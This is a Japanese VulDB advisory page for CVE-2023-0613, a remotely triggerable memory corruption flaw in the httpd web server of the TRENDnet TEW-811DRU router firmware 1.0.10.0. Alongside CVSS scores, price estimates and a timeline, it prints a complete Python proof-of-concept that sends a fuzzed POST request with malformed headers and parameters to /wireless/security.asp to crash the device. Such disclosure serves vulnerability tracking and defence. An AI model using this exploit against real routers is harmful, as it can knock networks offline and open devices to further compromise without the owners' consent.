TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/security.asp メモリ破損
| CVSS 一時的なメタスコア | 現在のエクスプロイト価格 (≈) | CTI注目指数 |
|---|---|---|
| 7.3 | $0-$5k | 0.00 |
要約
このたび、TRENDnet TEW-811DRU 1.0.10.0において、重大に分類される脆弱性が見つかりました。 この問題により影響を受けるのは、コンポーネント【httpd】のファイル【/wireless/security.asp】に含まれる未知の機能です。 この操作は、 メモリ破損を引き起こします。 この脆弱性はCVE-2023-0613という名称で流通しています。 攻撃はリモートから実行できます。 エクスプロイトは利用できません。
詳細
このたび、TRENDnet TEW-811DRU 1.0.10.0において、重大に分類される脆弱性が見つかりました。 この問題により影響を受けるのは、コンポーネント【httpd】のファイル【/wireless/security.asp】に含まれる未知の機能です。 この操作は、 メモリ破損を引き起こします。 問題をCWEで宣言すると、CWE-119 になります。 この弱点は 2023年02月01日に発表されました。
この脆弱性はCVE-2023-0613という名称で流通しています。 攻撃はリモートから実行できます。 テクニカルな情報があります。 この脆弱性の一般的な利用度は平均を下回っています。 エクスプロイトは利用できません。 このエクスプロイトは一般に公開されており、利用される恐れがあります。 現時点で、脆弱性の構成から考えられる取引価格帯を約$0-$5k米ドルと算出しました。
概念実証 に指定されています。 エクスプロイトはvuldb.comでダウンロードできます。 0-dayの場合、推定されるアンダーグラウンドでの価格は約$0-$5kでした。 エクスプロイトに使用されたソースコード:
import requests,socket import re import time from urllib.parse import urlencodedevice_web_ip = '192.168.10.1'
request = {'HEAD': {'Host': b'Z', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': b',\x80gpsiation//xm', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'enc\xbc\xbc\xbc', 'Content-Length': '1209', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/security.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': b'\x1d2' }, 'PARAM': {b'ecOe': b'/wireless/srcuri\x81\x80.asp', b'\x86od}': 'Qy4zq80U9FFhnKc0BBTA', 'wl_wps_mode': b'd\x10saDte\x80', b'\x96\x96': b' 5', 'wl_bssid': b'SS', 'security_mode': b'OO:E', b'\x88l\x88l_eu_aZ': 0, 'wl_auth_mode': 'none', b'cc@@zw(': 'enabled', 'wl_akm': b'', 'wl_akm_wpa': b'b\x85nd', 'wl_akm_psk': 'disabled', 'wl_akm_wpa2': b'disniled', 'wl_akm_psk2': b'\xd3isabled', 'wl_wai_cert_index': '', 'wl_wai_cert_status': '', b'\x00\xffak\xffakvv_w': 'disabled', b'wkm_wl_akm_wapi\x05\xff\xff': 'disabled', 'wl_key': 2, b'\x01': 'abcde', b'wl{k@{': 'abcdefabcdefe', b'Sk': b'\x01\x8b\x00', b'7l_+ey': b'a\x80\x00\x00\x01\x8f', 'wl_macmode': b'a\x1c(\x1a\xc2\xba\x04\x00al', 'wl_maclist': 48, b'\x7fmmAc3t0t0': '00:0c:29:d9:40:fe', b'wl_mac\xc3\x8f?\xc3\x86\x045\x00\x80\x1b\xc3\x88\xc3\x96\xc3\xa4S\xc2\x96\xc2\x96$\x00Dh\xc3\xb4\xc3\x9flis\xc3\x8b\x0bX>\t\xc2\xaaQ\x03': '00:0c:29:d9:40:ff', b'glFqacKist2': b'2:0c\x8029::@BJ40!fd', b'lmaylistaclma': '', 'wl_maclist4': '', 'wl_maclist5': b'', b'wleAaclb\x7fg': b'', 'wl_maclist7': b'', b'l_++++wlP++++++*+': '', 'wl_maclist10': b'', 'wl_maclist11': b'', b'w\xff\xff\xee\xff\x86ist\x80\x002': b'', b'wl_wlcl\x05\xff\xff\x053': '', b'hl@\x81B_\x7f\xff\x00\xff14': b'', b'w@_maclis': '', 'wl_maclist16': b'', b'wU_maczist17': b'', 'wl_maclist18': b'', 'wl_maclist19': b'', b'w\xc2\x98\x0b$jl\x87mlym
c\x9ai': b'', b'w|\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1': b'', b'a\x00\x00\x02\x00': '', 'wl_maclist23': '', 'wl_maclist24': b'', b'\xa9\x14\twl_maclis\xa9\x14\twl_maclist2': '', 'wl_maclist26': b'', 'wl_maclist27': '', 'wl_maclist28': '', b'wl_l_m\xba\xba\xba\xba\xba\xba': b'', b'l\xff\xff\xfd\xff\xff': b'', 'wl_maclist31': b'', b'J': b'', b'wl_macli\xfft\x00\x02': b'', 'wl_maclist34': b'', 'wl_maclist35': '', b'\x8dlTmaclist36': '', 'wl_maclist37': '', 'wl_maclist38': '', 'wl_maclist39': '', 'wl_maclist40': '', b'sl_maclicl': '', b'\x90l': b'', b'wW_maclist4\xb3': '', 'wl_maclist44': b'', 'wl_maclist45': '', 'wl_maclist46': b'', 'wl_maclist47': b'', b'\x00\x08\x7f': 'Apply', 'wan_apply': '<!--#tr id=', 'mg.alert.7': '', 'wl_key4': b'Q', b'alg.alg.05': b'', 'wl_maclist15': b'', 'expandable': b'', b'\xff\xff\xff\xff45': 4 }, 'ATTR': {'URL': 'http://{}/wireless/security.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } }
headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL']
try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) print('Finish attack, to check web state.') except Exception as e: print('error:{}'.format(e))
製品
ベンダー
名前
バージョン
ライセンス
CPE 2.3
CPE 2.2
CVSSv4
VulDB ベクトル: 🔍VulDB 信頼性: 🔍
CVSSv3
VulDB ベースメタスコア: 7.5VulDB 一時的なメタスコア: 7.3
VulDB ベーススコア: 7.5
VulDB 一時的なスコア: 6.8
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍
NVD ベーススコア: 7.5
NVD ベクトル: 🔍
CNA ベーススコア: 7.5
CNA ベクトル (VulDB): 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| ベクトル | 複雑さ | 認証 | 機密性 | 完全性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
NVD ベーススコア: 🔍
悪用
クラス: メモリ破損CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍
物理的: いいえ
ローカル: いいえ
リモート: はい
可用性: 🔍
アクセス: パブリック
ステータス: 概念実証
プログラミング言語: 🔍
ダウンロード: 🔍
Google Hack: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
脅威インテリジェンス
関心: 🔍アクティブアクター: 🔍
アクティブなAPTグループ: 🔍
対策
推奨: 既知の緩和策なしステータス: 🔍
0day日時: 🔍
タイムライン
2023年02月01日 🔍2023年02月01日 🔍
2023年02月01日 🔍
2023年03月01日 🔍
ソース
ステータス: 未定義CVE: CVE-2023-0613 (🔍)
GCVE (CVE): GCVE-0-2023-0613
GCVE (VulDB): GCVE-100-219937
scip Labs: https://www.scip.ch/en/?labs.20161013
エントリ
作成済み: 2023年02月01日 14:44更新済み: 2023年03月01日 11:37
変更: 2023年02月01日 14:44 (40), 2023年02月01日 14:45 (2), 2023年02月01日 17:52 (1), 2023年03月01日 11:30 (2), 2023年03月01日 11:37 (27)
完了: 🔍
提出者: leetsun
Cache ID: 216::103
提出
承諾済み
- 提出 #76278: Web crash on TRENDnet router TEW-811DRU (〜によって leetsun)
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。